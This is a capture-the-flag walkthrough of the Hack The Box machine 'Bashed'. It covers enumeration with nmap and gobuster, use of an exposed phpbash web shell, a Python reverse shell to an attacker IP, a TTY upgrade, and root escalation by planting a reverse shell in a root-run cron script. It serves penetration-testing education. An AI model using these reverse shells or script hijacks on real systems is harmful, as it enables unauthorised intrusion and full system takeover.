Bashed
info-card

Initial Enumeration

As always, we'll start off with a simple nmap scan:
1
nmap -sV 10.10.10.68
Copied!
Initial Nmap Scan
Usually with such sparse results I would run a full port scan, but we'll investigate this webserver for now seeing that this is a box rated easy. Navigating to the landing page of this webserver we see the following:
Landing Page
Well this certainly looks interesting. If you dig around through the posts on this page you'll learn that this is a project for running a terminal in your browser and you will also come across the github repo. Let's run a directory buster against this webserver to see what other pages it could be hiding:
1
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.68 -t 50
Copied!
Gobuster Results
From this we see a directory /dev which could be interesting. Navigating to this page shows us a file phpbash.php which gives us a php terminal as the www-data user in our browser:
PHPBash

Exploitation

While we have a web shell, I would much rather have a full reverse shell. I tried using my usual methods (nc or Bash -i), but python ended up being the tool for the job. Using the following command in the webshell we're able to trigger a reverse shell back to our host:
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Copied!
Reveres Shell
As usual on a Linux box, we check sudo -l for quick wins. This command shows us that we are able to run any command as the user scriptmanager:
Sudo Access
Before testing this access lets improve our QOL a little by converting our reverse shell to a full tty session. We can do this with python like so:
1
# Enter while in reverse shell
2
python -c 'import pty; pty.spawn("/bin/bash")'
3
​
4
Ctrl-Z
5
​
6
# In Kali
7
stty raw -echo
8
fg
9
​
10
# In reverse shell
11
reset
12
export SHELL=bash
13
export TERM=xterm-256color
Copied!
If you are asked for the terminal type after running reset and before you export the TERM variable. simply enter xterm-256color and proceed as normal.
After running these commands we'll have a fully interactive tty session, allowing us to use terminal functions such as clear and tab completion:
Fully interactive Shell
With this let's go ahead and assume the user scriptmanager using sudo:
1
sudo -i -u scriptmanager
Copied!
Assuming the scriptmanager User
With this access we are able to read the user flag:
User Flag

Privilege Escalation

Now that we're the scriptmanager user, let's take a look and see what we can do with this level of access. To start we'll check the root directory and list it's contents. In here we see that we are able to read, write, and execute in a directory called scripts. Inside of this directory lies two files, test.py and test.txt. What's interesting here is that scriptmanager owns test.py and root owns test.txt:
The Scripts Directory
Let's take a closer look at test.py:
1
f = open("test.txt", "w")
2
f.write("testing 123!")
3
f.close
Copied!
So it's a pretty simple script that opens a file test.txt in the current directory, writes testing 123! and closes the file. Knowing that the file test.txt is owned by root, we can assume that the root user is executing this script on some schedule. This makes this an easy task for us, because all we need to do is insert a reverse shell into this script and wait for it to be executed as the root user. To do this we will use the same logic as our first reverse shell, but because this will live in an actual python script we can clean up the syntax. After modification this is what test.py looks like:
1
import socket,subprocess,os
2
f = open("test.txt","w")
3
f.write("privesc")
4
f.close
5
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
6
s.connect(("10.10.14.13",4444))
7
os.dup2(s.fileno(),0)
8
os.dup2(s.fileno(),1)
9
os.dup2(s.fileno(),2)
10
p=subprocess.call(["/bin/sh","-i"])
Copied!
After writing this file and starting a netcat listener on port 4444 we only need to wait about a minute and our script is executed as the root user. This gives us the ability to read the root flag:
Root Flag
Last modified 1yr ago